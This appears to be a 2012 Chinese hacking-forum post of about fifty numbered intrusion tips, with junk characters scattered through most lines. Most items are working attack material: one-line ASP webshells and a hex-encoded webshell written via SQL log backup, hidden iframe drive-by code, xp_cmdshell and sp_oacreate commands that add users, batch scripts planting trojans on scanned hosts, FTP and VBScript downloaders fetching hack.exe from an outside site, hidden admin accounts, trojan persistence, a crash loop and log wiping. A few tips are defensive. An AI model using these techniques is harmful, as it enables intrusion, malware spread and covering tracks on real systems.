找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2258|回复: 0
打印 上一主题 下一主题

一些笔记

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:51:03 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下," l" J. ?) z1 H2 u' ~: t6 s0 M
cacls C:\windows\system32 /G hqw20:R7 d. c, l( V- m* h* s
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
( T/ w( m& e" [5 I恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F+ a0 c/ T- c/ Q; k* F
  C  l& s! W4 c7 ~& k" T
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。) h4 P# g+ c: C: K- P0 u( P" T: O
; ]4 K! W5 t( ?
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
' Z# M" N' N  H( w, ?: n( c
+ w9 O- ]! E) B5 q4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
- |$ v7 }0 Q! M: Y6 u; M
( A4 W* p8 f: }$ l5、利用INF文件来修改注册表
1 A4 o5 K+ v' V2 B8 t[Version]
/ g" D- r6 h3 h, p" w9 m7 ASignature="$CHICAGO$"
7 p* P2 B/ u3 }  R% r# k- S) @  h[Defaultinstall]
" V$ k2 E; w% Y2 C" \5 x, UaddREG=Ating
- G7 Q/ x5 Q9 V* c7 b[Ating]
  R$ q- u2 J, g$ Q& e0 nHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
" X, e; P7 l# e# m- ~$ C. a; Q以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:1 q, N  y; o- @
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径8 m5 O8 j3 e  {. W* i4 a
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU7 k; M. ?( t  }5 K# }* R
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
4 p( B8 S# D5 e6 f3 D# iHKEY_CURRENT_CONFIG 简写为 HKCC8 S: z5 Q4 F7 m7 f9 {" ~
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
9 n2 ]/ V6 u: S. B' w- d"1"这里代表是写入或删除注册表键值中的具体数据
( M  x6 J6 i9 k1 [: l$ _
* `' b0 ~( P' u/ ]& S6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,4 f7 a' t$ {/ j9 S" M
多了一步就是在防火墙里添加个端口,然后导出其键值7 i' v5 w( `) e
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]& ~) F" m  a4 v# l7 [5 A; }! ~, L

. X" @( P# @7 ^, ^+ d7 n7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
8 D# f: k" J/ V9 N' G在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
# C2 g7 f: c' u. I
3 V* c2 x  V8 P6 c5 I8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。" t/ |6 E, L; E8 v
9 g9 B! ~, A5 ~9 o6 H
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,- c9 U/ W. e2 w
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。: r) j0 r( g& E+ j  b. t, G
) j1 ^" ~6 y. i' q
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
+ c  Y$ d5 F- _$ b' y
% {+ C, P. ~0 H( [7 S2 S11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
# V4 \" x9 Z: H7 h& Z2 k用法:xsniff –pass –hide –log pass.txt
/ a5 z; w5 y! ?. e( g2 F4 O; U1 \( @
12、google搜索的艺术3 V7 C- B/ @$ U5 `$ m4 h  n) h
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
6 z; ], J- |( |* i或“字符串的语法错误”可以找到很多sql注入漏洞。
8 l8 q4 M9 M: y1 L9 \
* j9 E' s/ K9 h1 A4 U; w13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
- J% Z3 k& [1 @- K. a- Q) i+ O* j0 X4 m  h
14、cmd中输入 nc –vv –l –p 1987) o0 e! x* y6 b; K4 D
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃# E5 k, d: X' Y6 Z9 H" o$ g
1 h1 q, ]9 L  B1 h8 p3 K* w
15、制作T++木马,先写个ating.hta文件,内容为
9 p9 C" C, T' G+ l4 j2 I( ^. C; _<script language="VBScript">
% N; [* B* O% U' J- Xset wshshell=createobject ("wscript.shell" )$ g: h3 T" J3 ^: ?7 g
a=wshshell.run("你马的名称",1)
( z9 v9 }; L) w2 f5 ?4 awindow.close
6 m- D8 I3 G9 z</script>% g- L' Y$ `8 V5 S* X- y
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
7 U) f/ a( G/ ?5 u0 r: z, M2 W, w$ V8 L" c9 T
16、搜索栏里输入
; C- f  [4 Y; b+ e关键字%'and 1=1 and '%'='
- G2 E" Q0 j6 E1 G' j( ?8 L关键字%'and 1=2 and '%'='
) H' S& N6 e# A( {. m$ \比较不同处 可以作为注入的特征字符  W$ o* G! q  \1 Y' u

  y$ F3 e! U. t* s: W17、挂马代码<html>0 H9 V- {/ l3 a1 _" D
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
6 R3 O# E1 T9 Z, q( Q</html>
  H' {' A) y) |0 @$ Q; F/ O6 |! y) f( _" a  ^5 d- a
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
! p+ I7 n" h/ r7 g, o  znet localgroup administrators还是可以看出Guest是管理员来。/ q) q0 N; d5 S# X3 z
2 m1 \! x2 y: Y4 H" y: X+ ^( E
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
0 C5 k  R  O* y用法: 安装: instsrv.exe 服务名称 路径1 e1 ^* |- E% p* X
卸载: instsrv.exe 服务名称 REMOVE
4 G$ D) B" N$ q6 I  G7 O6 J) h, n: M* r9 h
& J6 V( T* Y! c( s5 z) v
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
1 o9 _$ l% u- w0 k/ ?1 p不能注入时要第一时间想到%5c暴库。
7 I- o# d7 `+ `
7 J( v: Z5 W& s* t22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
  r% X1 n  T1 E" x+ T' x1 E4 C/ C+ A' p
23、缺少xp_cmdshell时  M3 O( r5 ?; r
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
, M1 A! v: Q! T9 _假如恢复不成功,可以尝试直接加用户(针对开3389的)2 V8 a: D% x8 ^6 g, I
declare @o int
! j& G& w. ]2 hexec sp_oacreate 'wscript.shell',@o out
5 d" d& \. n$ xexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
1 `2 Z' z3 Z1 d; ~1 f9 V) q1 }$ o5 J
24.批量种植木马.bat( T5 e* o5 _$ L4 S3 j, G: d* M. Y
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
4 v7 j5 D! [0 }for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
/ m+ @7 Q% w9 B! h% d扫描地址.txt里每个主机名一行 用\\开头4 ^- Q( r# j8 A) M- M# E
" }$ T( L2 M5 ]
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
/ l+ K& D4 k0 ?7 P7 g" }$ j! w2 O3 G& j
" K7 E8 e5 T8 u3 Z9 T9 z1 g26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.( e9 J. a$ L* q3 n8 r. Z2 E' S: p
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.' m) I1 B$ l9 b$ I" y, N' J+ j
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马; M+ m) R: t+ n" W
( K% `+ K/ s: ~$ I5 _, c+ q8 r
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
- X# w1 y$ g( {/ j然后用#clear logg和#clear line vty *删除日志
& v' D/ J2 @- A( _2 {+ a0 b
$ j/ F' r7 w8 u' Q% t0 [: T$ {) [0 f28、电脑坏了省去重新安装系统的方法; ^' s: l" r: V
纯dos下执行,5 Z& p5 Y# \2 [8 B2 w" D- n
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config8 {. ^3 l* l" r' W! l" X! T
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
' a8 B4 e5 Q8 r7 P; x4 O1 b& M4 `& t1 A# _: S' s
29、解决TCP/IP筛选 在注册表里有三处,分别是:
4 _9 k3 `/ ~. C+ D( rHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip9 O, ?/ I1 D$ L2 ^8 H" [( V  a) f
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
0 N# A$ K0 ]. V" v3 p) MHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
! e: r( N5 a$ B+ K分别用
. |2 a! P* w! z& N$ g' T, jregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
1 a6 p3 h& V+ s  \3 Bregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip/ v4 [( C7 t, t; b: Z
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
" G+ I) j# k% e0 C3 Q命令来导出注册表项
3 ~- L  t+ K9 t然后把三个文件里的EnableSecurityFilters"=dword:00000001,& c& p5 f, u- w" W: v' y/ Y* M# E- S
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
; K3 L' F" I* Q/ Pregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。6 {6 S5 i+ E7 q$ F! ^9 n

# @9 n5 V4 o0 a) O9 B) v; g30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
2 H% o8 f/ J+ g5 ZSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的39 s% c8 W! |, e4 O9 H& ~
& B6 [/ W3 ~1 T% s* p' n
31、全手工打造开3389工具+ l% H% C1 p, x
打开记事本,编辑内容如下:
( V/ l2 ^  m5 G% c5 \6 f( _echo [Components] > c:\sql
6 N- b5 O2 w7 N3 lecho TSEnable = on >> c:\sql
& ?  G6 a3 t, zsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
# x* u1 V/ Y) X8 X& n编辑好后存为BAT文件,上传至肉鸡,执行
5 }0 [! a, `* d) l2 C1 _
" P! z2 F3 w% `4 [' k+ e32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马$ \, b# r: f/ P3 I2 a0 T& f3 w' @
9 {/ z/ Q; s5 _1 O- r- I
33、让服务器重启
5 n* c3 }$ f# j8 V  o1 e写个bat死循环:
# x& U7 d; G4 [% Y& O8 p@echo off( X' _" o# L+ X3 T7 z
:loop1
( ^2 A0 Z8 E8 k3 g6 Ucls
7 o" R5 O, k# ^+ E3 [start cmd.exe& b- z! _2 R* L9 z$ D
goto loop1
) P- x2 l8 v& a) S( k保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启! I# ?7 i5 v5 s" i  ~* W
3 R. s$ Q# k' @. ^4 \
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,  ~) d4 _, b% ~$ w+ d
@echo off) t  v& F- N3 s$ G2 G
date /t >c:/3389.txt* C# L+ f# l6 S- y" l' P2 l( g$ O
time /t >>c:/3389.txt
' N4 f) K& e  Nattrib +s +h c:/3389.bat
2 r9 b' q* ?4 r9 m6 U" j& c0 }7 cattrib +s +h c:/3389.txt
5 m4 {, R6 U7 i8 onetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
% i' H: O6 [; f, U) ~% f( B  J- y并保存为3389.bat
+ Q% o* e+ _5 t. B* _( r  k2 M打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号9 e" T4 x# m. V$ f8 R6 h  s) C
: q4 f6 Y7 D# ^# r4 D2 e- G
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
' h; P' m' p/ n( M8 M; p7 ~2 Tstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
' ?- `- C( j/ }- M% T输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。1 ^- T% {1 F2 B( l$ m- D* `- N2 c

9 c( `; Y' K) x36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件- y  p0 D; d! y- b  |) Z
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
( a4 m" R. S5 t7 H1 ~# d. W1 C+ becho 你的FTP账号 >>c:\1.bat //输入账号+ A! j! M* Q3 u
echo 你的FTP密码 >>c:\1.bat //输入密码/ ~5 b7 M8 _: i7 {0 n! [
echo bin >>c:\1.bat //登入
! S. R0 f9 `( ?: t, t9 Xecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么, F: O! `" N( S2 S
echo bye >>c:\1.bat //退出
: E4 N* O7 C/ K, j然后执行ftp -s:c:\1.bat即可
! i3 {9 H& C0 o) y, c0 `3 y* P; t. L' R
37、修改注册表开3389两法5 K, ?) s3 d7 m# i
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
9 M1 v& o5 j: Z+ e! C- pecho Windows Registry Editor Version 5.00 >>3389.reg
- e+ \7 T) E5 Yecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg5 \- X  k' _; ^) N
echo "Enabled"="0" >>3389.reg
4 }- W* X3 C% y2 @4 d7 z7 Secho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
/ [% R8 `; n( u6 x$ d0 r4 TNT\CurrentVersion\Winlogon] >>3389.reg4 |" M; `  p0 n. \9 M/ w8 p6 G
echo "ShutdownWithoutLogon"="0" >>3389.reg
! s/ m6 G# z! l* _& c5 decho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]& }; r# K. u8 V/ o+ Z* q2 U' P
>>3389.reg. `3 X2 \. i+ u: J' d6 F
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg$ t# O7 B' O/ V. k0 S
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]0 F8 t, a6 [& X
>>3389.reg
& A" ]2 h7 i2 Q  {echo "TSEnabled"=dword:00000001 >>3389.reg# n6 L5 V: |+ A$ h7 T4 x
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
- ?) Z6 l4 g7 u; y, Y* M2 Iecho "Start"=dword:00000002 >>3389.reg! b' b2 q5 x" r! p+ Y0 W( ?
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
4 c% _+ K4 b' |/ y: n>>3389.reg7 |( u5 f/ D8 c% J1 u
echo "Start"=dword:00000002 >>3389.reg
% g$ D6 x! t% ]) q9 {echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
1 T7 o+ [  _: S' T2 B8 e% }& Techo "Hotkey"="1" >>3389.reg& f4 ]# G6 }1 H) K3 Z
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal  ?  S7 H% w8 T3 F! \
Server\Wds\rdpwd\Tds\tcp] >>3389.reg3 F7 @- Q& B' h, s* F
echo "PortNumber"=dword:00000D3D >>3389.reg  ?' Y1 |( }4 E5 m
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal) @$ s1 P1 A& Q( g
Server\WinStations\RDP-Tcp] >>3389.reg% x. y: t) U4 ]6 s
echo "PortNumber"=dword:00000D3D >>3389.reg7 y$ C6 q* J4 q+ Z/ Q  H
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
9 T: h9 n* F5 M/ Y* d+ b2 ](如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
  J- A$ I- C: B因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效+ k* p& E- v+ ]2 H8 {+ c
(2)winxp和win2003终端开启
- ]9 l/ ^& F: E4 K9 `; r# \用以下ECHO代码写一个REG文件:3 Z! e: F  |/ L5 g+ r$ M
echo Windows Registry Editor Version 5.00>>3389.reg
& o) [0 Q% O6 u4 v& q0 `echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
+ q+ e( [) f' i; f7 {Server]>>3389.reg
% _6 @- t" B* ^9 v( g. e7 N6 t5 fecho "fDenyTSConnections"=dword:00000000>>3389.reg; P; v& d0 t! Z; U8 J2 W/ c; m+ i
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
# I" C! `; K3 Y. m! G" {Server\Wds\rdpwd\Tds\tcp]>>3389.reg5 S, ^+ ?5 _7 L3 w& ~, a" ?
echo "PortNumber"=dword:00000d3d>>3389.reg2 x$ g2 e0 j' I
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
2 k5 ?- w0 t" \' O/ R& n! z* P- lServer\WinStations\RDP-Tcp]>>3389.reg0 ]. ^8 E! U& \
echo "PortNumber"=dword:00000d3d>>3389.reg
; g1 M( k" v, O  ^% V然后regedit /s 3389.reg del 3389.reg$ [0 U0 S' ~  e( _0 v8 W: J
XP下不论开终端还是改终端端口都不需重启1 I# d- U# e" @' u
! L8 R7 e' X, g# c
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
" {) \9 X2 M2 O  p: y! _: [2 r用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'9 h' ]# y6 c& W( y) p

6 }/ b  D. Q, k39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!, v8 W. l  }* c: v/ k3 j
(1)数据库文件名应复杂并要有特殊字符' B$ y9 n+ Y7 u0 k
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源+ k+ I; F4 ^8 X. Q
将conn.asp文档中的% f8 y" }  g5 W
DBPath = Server.MapPath("数据库.mdb")
9 q$ V* v, H" R& econn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
/ T! K9 B2 K" `. E% R
, ~& ~0 L# g( r修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置: j% g/ }1 }: `1 S& o9 S9 |! `8 n. @
(3)不放在WEB目录里" U( j, n* X, m

3 ]# y' `0 m4 ^: z40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉8 j% u9 q5 b+ ^* ?6 g/ N
可以写两个bat文件: j" z+ t# Z( ~& T6 c) q; L
@echo off
! N8 W- C# Z: g# s5 H7 a@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe+ ?9 P6 ?+ l. o% Y' `" g0 \
@del c:\winnt\system32\query.exe5 ?) j: G& P& L9 ?, ^- `9 K
@del %SYSTEMROOT%\system32\dllcache\query.exe  b* H/ p2 m4 s9 R; h( R0 M
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的& L* J1 a- [+ f3 [/ `

" N0 |& @- L' W% G@echo off
9 C8 u0 z3 d2 P  Y9 v; |$ P# r@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe. q& W1 O! E3 ]& H' W
@del c:\winnt\system32\tsadmin.exe9 s% l" l3 W' u2 C0 g* e
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
" i) S# l5 o2 w: a% r
& g- E" m) A  ~0 o9 D0 s41、映射对方盘符
5 H1 R) ~: h' e: L9 ]$ itelnet到他的机器上,8 P) h6 H6 X5 j6 d& n7 R0 _# A4 [
net share 查看有没有默认共享 如果没有,那么就接着运行
- \) R7 c; F' D  |+ L  onet share c$=c:* y( t9 M/ k# _/ G6 s8 b6 T( i1 d
net share现在有c$
- \- c: f4 g. f: i  ^7 r在自己的机器上运行
/ P7 @/ o0 q) y( |net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
9 l0 h' {! U* G8 d0 b
  `5 Q$ D+ l7 w2 V2 ^, V- u- e42、一些很有用的老知识, ]  Y# H, r1 Q9 t5 V5 g) Y
type c:\boot.ini ( 查看系统版本 )! T6 [5 t2 H7 T1 F, F3 J% B
net start (查看已经启动的服务)% W& J% w0 S; C7 S
query user ( 查看当前终端连接 )3 [7 u( l4 N8 F# y6 O/ q, u
net user ( 查看当前用户 )5 z4 }# B7 d0 V; a% ?7 T
net user 用户 密码/add ( 建立账号 )1 O3 }+ B) H8 C5 w) Z
net localgroup administrators 用户 /add (提升某用户为管理员)# b, H# |; w, ?
ipconfig -all ( 查看IP什么的 )
- I' k& Q4 i$ {0 Gnetstat -an ( 查看当前网络状态 )
1 I8 S9 i* o+ m; Afindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)6 B& L7 W! s8 z. w: T- Y! K, V
克隆时Administrator对应1F4
8 |8 ?6 ~5 Y; i) Q( R- I6 q. X6 wguest对应1F5) I& o: `6 }* ]) x3 g& a! a
tsinternetuser对应3E8! |4 @4 d* P( j& L6 V3 U

/ R& `9 L& E; b" B- N5 z/ z43、如果对方没开3389,但是装了Remote Administrator Service6 U$ W1 T" y$ F: b& e& \  i: _
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接: O# m5 _* r- H4 y- p) C( \
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息9 q( F4 a* t9 O, [6 U
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
! W! b# H1 O% h- P  Z
7 H/ @3 Q: j6 l5 b0 V' w) c44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)3 D  {: n& R# \. a# U) V. [: k
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)* Z- b3 l! A4 z5 K% T' j

7 s* z0 z  V( r' [$ S45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)- z6 o0 Q" u8 {% n2 u
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
% N) l  i0 }! W) ?7 R6 i+ \* F^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =. C: C( G. Z8 V/ M, @
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
8 K- w0 Q2 f1 P" C' I6 Z( ]. X4 m, Q1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs, N' u0 _. }2 j% v
(这是完整的一句话,其中没有换行符)
) l6 |3 a( U# b! F: C然后下载:
( L3 |; L" Q+ ?$ |. @' K* Wcscript down.vbs http://www.hack520.org/hack.exe hack.exe( G. I8 A4 K9 \3 E( J' f$ }
7 _, e3 P8 v% @6 p" S
46、一句话木马成功依赖于两个条件:# E/ g4 k! o1 U2 |
1、服务端没有禁止adodb.Stream或FSO组件
4 n4 V/ n& T% P! L, j2 v2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
* X/ B' ?$ t2 Z1 `, \
" B2 t0 {- Z7 N, Q% _" I47、利用DB_OWNER权限进行手工备份一句话木马的代码:% P2 x4 \( ^, {0 c- C' \
;alter database utsz set RECOVERY FULL--
& [+ C/ B$ Y( t3 n;create table cmd (a image)--% F$ H7 r- ?# P7 [7 L& t
;backup log utsz to disk = 'D:\cmd' with init--
4 G$ `! ]4 R! I) o# A6 M$ ]/ j$ ?& t;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--' w. `, s6 t9 L4 K
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--& u7 `& g0 E' A$ L
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。% r# u3 A6 s( K$ J
8 W( o  x. q6 v6 B9 Y8 Z/ Z( y# z
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
% a$ m/ H' @. _1 h2 A
5 _+ u' a7 r8 W! ?用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options4 h! e6 E/ k8 M) I5 M+ V
所有会话用 'all'。
8 O1 n  ~" ]6 Y1 X, s$ f+ N+ f-s sessionid 列出会话的信息。; r1 y6 }1 h1 Q; x4 F
-k sessionid 终止会话。
& c+ i0 @: U$ q; }-m sessionid 发送消息到会话。/ \8 Z) V% V# |, F( M
5 f1 M& C/ P7 }9 K1 G4 \
config 配置 telnet 服务器参数。1 Y' T; h# [+ D8 m5 T/ o. b

% q0 L1 F7 q3 l) {4 J. Rcommon_options 为:7 f& n$ g/ E' C7 T. z* s0 c
-u user 指定要使用其凭据的用户
! L# ]4 v+ v0 y0 P3 H9 }-p password 用户密码
) J: _% q6 X5 I% W8 I" L
3 L2 P! m9 A4 J: ^config_options 为:8 c! s& b  D; M! u3 k8 P
dom = domain 设定用户的默认域( t3 m/ A. C2 l6 \' s
ctrlakeymap = yes|no 设定 ALT 键的映射
$ U' J2 O5 M% Y# Dtimeout = hh:mm:ss 设定空闲会话超时值
$ m( a" t; d# _; utimeoutactive = yes|no 启用空闲会话。
' Q2 {+ G3 ~" W. wmaxfail = attempts 设定断开前失败的登录企图数。
' ?+ C- B% l7 n( U5 Rmaxconn = connections 设定最大连接数。
: h9 P, l' W$ p  H" Tport = number 设定 telnet 端口。6 P% k  N0 B. ^( }2 q5 h
sec = [+/-]NTLM [+/-]passwd  U/ K  z) K9 p
设定身份验证机构
4 d5 _" k4 R9 J7 p1 n2 G: ufname = file 指定审计文件名。
' p& k; q3 Z  W& d+ Dfsize = size 指定审计文件的最大尺寸(MB)。
+ ~% j0 E; B3 G& g9 h1 Hmode = console|stream 指定操作模式。
+ d2 n) {& t: _7 B7 nauditlocation = eventlog|file|both
& K8 J0 v2 D$ y7 U. g7 r% `指定记录地点
9 ^, \# O7 _2 g( Gaudit = [+/-]user [+/-]fail [+/-]admin
! s* E5 F# }/ D% R1 ^2 o1 y. p' z- p& B8 |, g7 @: D5 O! C
49、例如:在IE上访问:: w% r) |1 o$ A  X
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
$ w. j: o3 W# X1 D' ehack.txt里面的代码是:6 V& e8 o8 ~) H6 ?- j+ h
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
7 B1 b7 }: m8 k4 I: Z5 f把这个hack.txt发到你空间就可以了!% ]) h5 [3 z8 @. I5 }
这个可以利用来做网马哦!
: f( R' \) W' J% t& P7 p8 M5 Q# r, S" E* |
50、autorun的病毒可以通过手动限制!
, s# E/ s  ^/ Z6 \7 G. I& F2 ?3 I1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!$ }  k* o2 u) g3 [
2,打开盘符用右键打开!切忌双击盘符~3 t2 V  u$ \% @% a/ u. n
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
8 R1 m' D9 l# M# O1 `
3 t3 G7 H( S" [3 C51、log备份时的一句话木马:, I1 c+ N" V& y
a).<%%25Execute(request("go"))%%25>
- r8 K! a% ~$ tb).<%Execute(request("go"))%>
9 U: k' p8 g  U. yc).%><%execute request("go")%><%* U, k' ?5 u  X. m: f6 U5 V
d).<script language=VBScript runat=server>execute request("sb")</Script>
# e# U7 j" E. ]/ n2 ae).<%25Execute(request("l"))%25>  `/ R; |+ J1 o) y2 m$ B
f).<%if request("cmd")<>"" then execute request("pass")%>3 A( ~5 j4 O, L$ k, U5 r& j5 H
( A; f1 c5 u  {* l
